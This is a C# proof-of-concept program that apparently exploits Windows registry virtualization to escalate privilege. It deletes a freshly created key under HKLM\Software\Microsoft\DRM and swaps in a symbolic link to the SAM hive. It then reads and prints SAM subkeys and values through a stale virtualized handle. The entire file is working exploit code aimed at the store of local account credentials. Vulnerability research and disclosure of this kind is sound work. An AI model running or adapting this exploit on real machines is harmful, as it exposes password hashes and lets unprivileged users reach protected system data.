﻿using NtApiDotNet;
using System;

namespace PoC_RegistryVirtualizationEnum_EoP
{
    class Program
    {
        static NtKey CreateKey(string name, string sddl)
        {
            Console.WriteLine("Creating Key {0}", name);

            using (var obja = new ObjectAttributes(name, AttributeFlags.CaseInsensitive, SafeKernelObjectHandle.Null, 
                null, new SecurityDescriptor(sddl)))
            {
                return NtKey.Create(obja, KeyAccessRights.MaximumAllowed, KeyCreateOptions.NonVolatile);
            }
        }

        static void SetVirtualization(bool enable)
        {
            using (var token = NtToken.OpenProcessToken())
            {
                token.VirtualizationEnabled = enable;
            }
        }

        static void Main(string[] args)
        {
            try
            {
                string key_name = $@"\Registry\Machine\Software\Microsoft\DRM\{Guid.NewGuid()}";
                using (var base_key = CreateKey(key_name, "D:(A;;GR;;;WD)(A;;GA;;;BA)"))
                {
                    SetVirtualization(true);
                    // Ensure the key is virtualized.
                    using (var virt_key = NtKey.Open(key_name, null, KeyAccessRights.SetValue))
                    {
                        virt_key.SetValue("DUMMY", 0);
                    }

                    using (var virt_key = NtKey.Open(key_name, null, KeyAccessRights.GenericRead | KeyAccessRights.SetValue))
                    {
                        SetVirtualization(false);
                        base_key.Delete();
                        base_key.Close();
                        using (var symlink_key = NtKey.CreateSymbolicLink(key_name, null, @"\Registry\Machine\SAM\SAM"))
                        {
                            try
                            {
                                SetVirtualization(true);
                                foreach (var subkey in virt_key.QueryKeys())
                                {
                                    Console.WriteLine(subkey);
                                }
                                foreach (var value in virt_key.QueryValues())
                                {
                                    Console.WriteLine("{0} - {1}", value.Name, value);
                                }
                            }
                            finally
                            {
                                symlink_key.Delete();
                            }
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
